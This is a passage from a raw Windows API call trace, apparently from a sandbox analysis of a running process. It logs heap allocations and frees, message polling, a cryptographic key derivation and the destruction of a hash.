HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0216.363] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0216.363] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0216.363] CryptDeriveKey (in: hProv=0xa5f958, Algid=0x6601, hBaseData=0xa87290, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0xa87650) returned 1 [0216.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0216.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b28 [0216.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0216.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0216.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0216.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0216.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0216.363] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0216.363] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0216.363] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0216.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0216.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0216.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0216.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0216.363] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0216.363] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0216.363] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0216.364] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0216.364] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0216.364] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0216.364] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0216.364] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0216.364] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0216.364] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0216.364] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0216.364] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0216.364] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0216.364] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0216.364] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0216.364] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0216.364] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0216.364] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0216.364] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0216.364] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50dd0 [0216.364] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0216.364] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0216.364] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0216.364] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0216.364] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0216.364] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0216.364] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0216.364] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0216.364] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0216.364] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0216.364] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0216.364] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0216.364] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0216.365] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0216.365] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0216.365] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0216.365] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54210 | out: hHeap=0x970000) returned 1 [0216.365] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0216.365] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0216.365] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0216.365] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0216.365] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0216.365] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0216.365] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0216.365] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0216.365] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0216.365] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0216.365] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0216.365] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0216.365] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0216.365] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0216.365] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0216.365] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0216.365] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0216.365] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0216.365] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0216.365] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0216.365] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0216.365] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0216.365] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0216.365] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0216.365] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0216.365] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0216.365] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0216.366] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0216.366] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977db8 | out: hHeap=0x970000) returned 1 [0216.366] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0216.366] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0216.366] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0216.366] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0216.366] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699a8 | out: hHeap=0x970000) returned 1 [0216.366] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0216.366] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0216.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0216.366] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0216.366] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0216.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0216.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0216.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0216.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a48 [0216.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0216.366] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0216.366] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0216.366] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a48 | out: hHeap=0x970000) returned 1 [0216.366] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0216.366] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0216.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77588 [0216.366] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0216.366] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77588 | out: hHeap=0x970000) returned 1 [0216.366] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0216.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0216.366] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0216.366] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0216.366] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0216.367] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0216.367] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0216.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0216.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0216.367] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0216.367] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0216.367] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0216.367] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0216.367] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0216.367] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0216.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0216.367] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0216.367] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0216.367] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0216.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0216.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0216.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0216.367] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0216.367] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0216.367] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0216.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0216.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e508c0 [0216.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50908 [0216.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50938 [0216.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0216.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50848 [0216.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54468 [0216.367] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0216.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50950 [0216.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50998 [0216.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e509b0 [0216.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0216.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50860 [0216.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78bb8 [0216.368] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54468 | out: hHeap=0x970000) returned 1 [0216.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507e8 [0216.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0216.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e506f8 [0216.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50878 [0216.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0216.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50c50 [0216.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50aa0 [0216.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0216.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50a28 [0216.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50ba8 [0216.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0216.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0216.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0216.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7ffb8 [0216.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0216.369] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0216.369] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ffb8 | out: hHeap=0x970000) returned 1 [0216.369] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0216.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50ab8 [0216.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78c00 [0216.369] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0216.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0216.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0216.369] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0216.369] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0216.369] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78c00 | out: hHeap=0x970000) returned 1 [0216.369] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0216.369] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0216.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0216.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0216.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0216.369] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0216.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0216.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0216.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0216.369] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0216.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0216.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0216.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0216.369] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0216.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543a0 [0216.369] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0216.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0216.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0216.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0216.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0216.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0216.370] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0216.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0216.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0216.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0216.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0216.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0216.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0216.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0216.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0216.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0216.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0216.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0216.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0216.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0216.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0216.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0216.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0216.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0216.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0216.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0216.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0216.370] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0216.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x11) returned 0x2e69b08 [0216.371] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2e69b08, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0216.371] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0216.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54468 [0216.371] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0216.371] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDestroyHash") returned 0x756ff0e0 [0216.371] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54468 | out: hHeap=0x970000) returned 1 [0216.371] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0216.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0216.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0216.371] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0216.371] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0216.371] CryptDestroyHash (hHash=0xa87290) returned 1 [0216.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0216.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0216.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0216.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0216.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0216.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0216.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0216.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0216.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0216.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0216.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0216.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, 